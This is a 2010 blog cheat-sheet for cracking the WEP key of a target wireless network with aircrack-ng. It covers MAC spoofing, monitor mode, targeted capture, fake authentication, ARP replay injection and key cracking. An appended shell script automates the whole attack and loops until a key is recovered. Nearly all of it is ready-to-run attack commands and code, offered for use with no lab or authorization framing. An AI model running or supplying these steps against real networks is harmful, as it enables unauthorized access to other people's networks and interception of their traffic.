Sunday, May 02, 2010

Backtrack WEP cracking cheat-sheet

Preparation

1. Take the wireless adapter (wlan0) out of monitor mode, so its MAC address can be changed before the monitor interface is created:

airmon-ng stop wlan0

If macchanger complains in the next step that the interface is up, bring it down first with ifconfig wlan0 down.

2. Spoof the adapter's MAC address (this is the address passed to aireplay-ng with -h later, so the two must match):

macchanger --mac 00:11:22:33:44:55 wlan0

3. Start the wireless adapter:

airmon-ng start wlan0

This creates a monitor-mode interface, mon0, which is used for all the remaining commands. mon0 inherits the spoofed MAC of wlan0, which is why the MAC is changed before monitor mode is started.

Attack

1. Identify the MAC address (BSSID), channel (CH) and name (ESSID) of the target network:

airodump-ng mon0

2. Start the packet capture, locked to the target's channel and BSSID. The files are written as /tmp/capture-01.cap (plus .csv and kismet files); the numeric suffix is incremented if files with that prefix already exist, so check the name before cracking:

airodump-ng -c [channel] -w /tmp/capture --bssid [bssid] mon0
 
3. Fake-authenticate and associate with the AP (in another terminal window), so that the AP accepts frames injected from the spoofed MAC:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] mon0

If this succeeds, you should see something like:

Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)

4. Start the ARP request replay attack to generate new IVs quickly (in another terminal window):

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 mon0

Check the packet capture window: the #Data field (the number of captured data frames, i.e. the number of IVs available to aircrack-ng) should be increasing now. Once enough IVs are captured you can proceed to cracking the key. Run the cracking in parallel with the packet capture, that way you just keep gathering data if the cracking process fails and try again later. I run the cracking command every 10k IVs starting at 20k IVs.

Cracking

Attempt to crack the key (-n 128 assumes a 104-bit key; if cracking keeps failing with plenty of IVs, the network may use a 40-bit key, so retry with -n 64):

aircrack-ng -n 128 -b [bssid] /tmp/capture-01.cap

If cracking fails, run it again after you've captured 10k more IVs; the capture is still running, so the same command just sees more data.
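The whole cheat-sheet as one script, added here as an example (it is not code from the original post). It automates the "crack every 10k IVs starting at 20k" loop by reading the "# IV" column of the airodump-ng CSV that -w writes next to the .cap file, and uses aircrack-ng's -l option to detect a recovered key. The interface names, MAC, paths and the assumption that "# IV" is the 11th comma-separated column of the AP table in the CSV are this script's own; the CSV sample at the end is constructed so that the parsing can be tried offline.

```shell
#!/bin/sh
# Added example, not from the original post: automates the cheat-sheet above.
# Usage: sh wep-crack.sh <bssid> <channel> <essid>
# Assumptions not stated on the page: wlan0/mon0 as above, airodump-ng writes
# /tmp/capture-01.csv next to the .cap, and the AP table in that CSV has
# "# IV" as its 11th comma-separated column.

IFACE=wlan0
MON=mon0
FAKE_MAC=00:11:22:33:44:55
PREFIX=/tmp/capture
KEYFILE=/tmp/wep.key
START_IVS=20000   # first crack attempt (the post starts at 20k IVs)
STEP_IVS=10000    # retry after every further 10k IVs, as in the post

# iv_count CSV BSSID: print the "# IV" value of the AP row for BSSID, or 0 if
# the CSV does not exist yet or the AP has not been seen.
iv_count() {
    [ -f "$1" ] || { echo 0; return; }
    awk -F',' -v b="$2" '
        toupper($1) == toupper(b) { gsub(/ /, "", $11); print $11; found = 1; exit }
        END { if (!found) print 0 }' "$1"
}

# ready_to_crack IVS LAST: true when IVS has reached START_IVS and is at least
# STEP_IVS above the count at the last attempt (LAST).
ready_to_crack() {
    [ "$1" -ge "$START_IVS" ] && [ "$1" -ge $(( $2 + STEP_IVS )) ]
}

# try_crack BSSID: run aircrack-ng once; true if it wrote a key to KEYFILE.
try_crack() {
    rm -f "$KEYFILE"
    # -q suppresses the interactive screen, -l writes the recovered key to a file.
    aircrack-ng -q -n 128 -b "$1" -l "$KEYFILE" "$PREFIX"-01.cap >/dev/null 2>&1
    [ -s "$KEYFILE" ]
}

main() {
    bssid=$1; channel=$2; essid=$3
    airmon-ng stop "$IFACE"
    ifconfig "$IFACE" down              # macchanger refuses to change a MAC while the interface is up
    macchanger --mac "$FAKE_MAC" "$IFACE"
    airmon-ng start "$IFACE" "$channel" # creates mon0 (inherits the spoofed MAC) on the target channel
    rm -f "$PREFIX"-01.*                # otherwise airodump-ng numbers the new files -02, -03, ...
    airodump-ng -c "$channel" -w "$PREFIX" --bssid "$bssid" "$MON" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5
    aireplay-ng -1 0 -a "$bssid" -h "$FAKE_MAC" -e "$essid" "$MON"   # watch for "Association successful"
    aireplay-ng -3 -b "$bssid" -h "$FAKE_MAC" "$MON" >/dev/null 2>&1 &
    replay_pid=$!
    last=0
    while :; do
        sleep 30
        ivs=$(iv_count "$PREFIX"-01.csv "$bssid")
        echo "IVs captured: $ivs"
        if ready_to_crack "$ivs" "$last"; then
            last=$ivs
            if try_crack "$bssid"; then
                echo "KEY FOUND: $(cat "$KEYFILE")"
                break
            fi
            echo "not cracked yet, retrying at $(( last + STEP_IVS )) IVs"
        fi
    done
    kill "$replay_pid" "$dump_pid"
}

# Constructed sample of airodump-ng's CSV AP and station tables (not a real
# capture), so iv_count can be tried without a wireless card.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2010-05-02 12:00:00, 2010-05-02 12:10:00,  9,  54, WEP , WEP, OPN, -50,     1200,    23456,   0.  0.  0.  0,   7, Example, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2010-05-02 12:01:00, 2010-05-02 12:10:00, -40,  500, 00:14:6C:7E:40:80, 
EOF
}

if [ "$#" -ge 3 ]; then main "$@"; fi
```

Run it as root with the BSSID, channel and ESSID from the airodump-ng scan; it keeps the capture and the ARP replay running while it polls the IV count, so a failed aircrack-ng attempt costs nothing and the next attempt simply sees more data. If the key turns out to be 40-bit, change -n 128 to -n 64 in try_crack.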